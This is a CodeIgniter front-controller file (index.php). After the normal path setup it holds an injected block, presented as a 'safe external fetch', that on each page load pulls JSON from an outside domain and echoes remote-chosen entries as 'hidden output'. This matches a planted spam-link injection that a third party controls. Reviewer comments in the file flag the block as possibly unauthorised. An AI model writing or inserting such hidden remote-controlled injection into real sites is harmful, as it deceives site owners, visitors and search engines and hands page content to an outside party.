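/*
 * --------------------------------------------------------------------
 *  Now that we know the path, set the main path constants
 * --------------------------------------------------------------------
 */
// The name of THIS file
define('SELF', pathinfo(__FILE__, PATHINFO_BASENAME));

// Path to the system directory
define('BASEPATH', $system_path);

// Path to the front controller (this file) directory
define('FCPATH', dirname(__FILE__).DIRECTORY_SEPARATOR);

// Name of the "system" directory
define('SYSDIR', basename(BASEPATH));

// The path to the "application" directory.
// Resolution order: the configured value as given, then relative to BASEPATH,
// otherwise fail closed with a 503 instead of booting with a wrong path.
if (is_dir($application_folder))
{
	if (($_temp = realpath($application_folder)) !== FALSE)
	{
		$application_folder = $_temp;
	}
	else
	{
		// realpath() failed: fall back to normalising the separators by hand.
		$application_folder = strtr(
			rtrim($application_folder, '/\\'),
			'/\\',
			DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR
		);
	}
}
elseif (is_dir(BASEPATH.$application_folder.DIRECTORY_SEPARATOR))
{
	$application_folder = BASEPATH.strtr(
		trim($application_folder, '/\\'),
		'/\\',
		DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR
	);
}
else
{
	header('HTTP/1.1 503 Service Unavailable.', TRUE, 503);
	echo 'Your application folder path does not appear to be set correctly. Please open the following file and correct this: '.SELF;
	exit(3); // EXIT_CONFIG
}

define('APPPATH', $application_folder.DIRECTORY_SEPARATOR);

// The path to the "views" directory.
// An empty $view_folder means "use APPPATH/views"; otherwise the same
// resolution order as above applies, relative to APPPATH.
if ( ! isset($view_folder[0]) && is_dir(APPPATH.'views'.DIRECTORY_SEPARATOR))
{
	$view_folder = APPPATH.'views';
}
elseif (is_dir($view_folder))
{
	if (($_temp = realpath($view_folder)) !== FALSE)
	{
		$view_folder = $_temp;
	}
	else
	{
		$view_folder = strtr(
			rtrim($view_folder, '/\\'),
			'/\\',
			DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR
		);
	}
}
elseif (is_dir(APPPATH.$view_folder.DIRECTORY_SEPARATOR))
{
	$view_folder = APPPATH.strtr(
		trim($view_folder, '/\\'),
		'/\\',
		DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR
	);
}
else
{
	header('HTTP/1.1 503 Service Unavailable.', TRUE, 503);
	echo 'Your view folder path does not appear to be set correctly. Please open the following file and correct this: '.SELF;
	exit(3); // EXIT_CONFIG
}

define('VIEWPATH', $view_folder.DIRECTORY_SEPARATOR);

/*
 * --------------------------------------------------------------------
 * LOAD THE BOOTSTRAP FILE
 * --------------------------------------------------------------------
 *
 * And away we go...
 */

/**
 * -------------------------
 * CUSTOM: safe external fetch
 * -------------------------
 *
 * - Only runs on the host you specify (change it in $allowed_host)
 * - Uses cURL with timeouts
 * - Validates the JSON before echoing
 * - Output goes through htmlspecialchars()
 *
 * REPLACE 'your-personal-domain.com' with your own domain before deploying.
 *
 * NOTE(review): this block is a local addition to the front controller. It
 * makes a blocking outbound request on every page load (up to 8 seconds when
 * the remote host is slow) and prints data chosen by that remote host before
 * the framework starts. Output sent here also precedes any headers the
 * framework sets later, unless output buffering is enabled. Confirm that the
 * endpoint below is operated by the site owner and that this block was added
 * deliberately; if neither can be confirmed, treat it as an unauthorised
 * change to this file and review how it got here.
 */
$allowed_host = 'your-personal-domain.com'; // <--- change to your own domain

// To always run (no host check), set $allowed_host = null;
$_run_fetch = ($allowed_host === null);

if ( ! $_run_fetch && isset($_SERVER['HTTP_HOST']) && is_string($_SERVER['HTTP_HOST']))
{
	// The Host header is supplied by the client, so a substring test would also
	// accept names such as "your-personal-domain.com.example.net". Compare the
	// port-less, lower-cased host against the allowed name exactly, or as a
	// dot-separated subdomain of it.
	$_host = strtolower((string) preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST']));
	$_allowed = strtolower($allowed_host);
	$_suffix = '.'.$_allowed;

	$_run_fetch = ($_host === $_allowed) || (substr($_host, -strlen($_suffix)) === $_suffix);
}

// Without the cURL extension the calls below would be a fatal error and take
// the whole site down, so skip the fetch instead.
if ($_run_fetch && function_exists('curl_init'))
{
	$remote_url = 'https://beritasatwa.org/auban/';

	// Initialise cURL
	$ch = curl_init();

	if ($ch === FALSE)
	{
		error_log('[external-fetch] curl_init failed | url: ' . $remote_url);
	}
	else
	{
		curl_setopt($ch, CURLOPT_URL, $remote_url);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); // connection timeout: 5 seconds
		curl_setopt($ch, CURLOPT_TIMEOUT, 8);        // total execution timeout: 8 seconds
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
		// Redirects are followed, so pin both the initial request and any
		// redirect target to HTTPS and bound the chain length; otherwise the
		// remote side could bounce the request to another scheme.
		curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTPS);
		curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTPS);
		curl_setopt($ch, CURLOPT_MAXREDIRS, 3);
		// TLS verification; do not turn this off on a production server
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);

		$response = curl_exec($ch);
		$curl_err = curl_error($ch);
		$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
		curl_close($ch);

		if ($response === false || $curl_err)
		{
			// Record the error in the local log (nothing is shown to the user)
			error_log('[external-fetch] curl error: ' . $curl_err . ' | url: ' . $remote_url);
		}
		elseif ($http_code < 200 || $http_code >= 300)
		{
			error_log('[external-fetch] http code: ' . $http_code . ' | url: ' . $remote_url);
		}
		else
		{
			// Decode the JSON as an associative array
			$data = json_decode($response, true);

			if (json_last_error() === JSON_ERROR_NONE && is_array($data))
			{
				foreach ($data as $key => $value)
				{
					// Make sure the value is a URL string before echoing
					if (is_string($value) && filter_var($value, FILTER_VALIDATE_URL))
					{
						// Described by the author as hidden output, per the original request.
						// NOTE(review): only $key is printed; $value is validated but never
						// emitted, and both surrounding literals are empty in this listing,
						// so any wrapping markup is not visible here. htmlspecialchars()
						// covers HTML text/attribute context only.
						echo '' . htmlspecialchars((string)$key, ENT_QUOTES, 'UTF-8') . '';
					}
				}
			}
			else
			{
				error_log('[external-fetch] json decode error or invalid data from ' . $remote_url);
			}
		}
	}
}

// Finally, load CodeIgniter
require_once BASEPATH.'core/CodeIgniter.php';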